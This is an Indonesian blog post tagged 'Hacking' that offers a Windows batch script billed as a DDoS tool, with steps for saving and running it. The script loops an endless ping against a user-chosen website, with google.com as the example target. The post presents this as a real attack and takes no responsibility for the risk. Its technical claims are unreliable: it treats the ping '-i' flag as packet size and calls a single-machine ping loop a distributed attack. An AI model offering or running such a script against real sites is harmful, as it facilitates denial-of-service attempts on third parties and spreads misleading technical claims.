Cara Membuat DDos Via Notepad

DDos
Engginer-system | Dalam posting saya kali ini saya akan share script untuak membuat sebuah DDos (Distributed Denial of Service) pada notepad dan di aplikasikan via CMD dengan format .Bat. oke langsung aja gan simak langkah-langkah pembuatannya berikut ini :


DDos Via Notepad 

LANGKAH 1

Copy Code di bawah ini : 

 
 

------------------------------------------------------------------------------------------------------------------------------------------------------------

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
------------------------------------------------------------------------------------------------------------------------------------------------------------

LANGKAH 2 :

Buka notepad, paste-kan code tadi.

LANGKAH 3 :

Save file anda seperti dibawah :

File Name : DDoS Attack.bat

Save As Type : All File <--- PENTING

Cara-cara menggunakannya :

1. Double click file anda itu.

2. Akan tertera : Server-Target:

Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

Contoh :

Sebelum =>
http://www.google.com/

isikan seperti ini saja =>
www.google.com

Setelah memasukkan url, tekan enter.

3. website itu akan di-ping untuk mendapatkan ip address. Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging
www.l.google.com

[209.85.175.106] with 32 bytes of data:

Reply from 209.85.175.106: bytes=32 time=30ms TTL=56

Reply from 209.85.175.106: bytes=32 time=40ms TTL=55

Reply from 209.85.175.106: bytes=32 time=24ms TTL=56

Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 24ms, Maximum = 40ms, Average = 32ms

209.85.175.106 <----- IP address
www.google.com

4. Kemudian akan terpapar di tool itu : ip Host:

Masukkan saja ip address yang anda dapat tadi.

Contoh :

ip Host:209.85.175.106

dan tekan enter.

5. Packet Size :

Isi berapa banyak yang anda mau.

Contoh :

Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu artinya tool itu sedang menjalankan tugasnya (DDoS).



SEMOGA BERMANFAAT | RESIKO BUKAN TANGGUNGAN ADMIN 


 
Tag : Hacking
0 Komentar untuk "Cara Membuat DDos Via Notepad"

W A R N I N G !!!

Komentar Anda Tidak Boleh Mengandung Unsur:
1. Penghinaan atau pelecehan.
2. Spamming (spam comment).
3. Link aktif atau text anchor dan sejenisnya
.

*Berkomentarlah Dengan Baik Dan Sopan Jika Ingin Di Respon Pertanyaan Anda | Don't Copy My Posting !!

Back To Top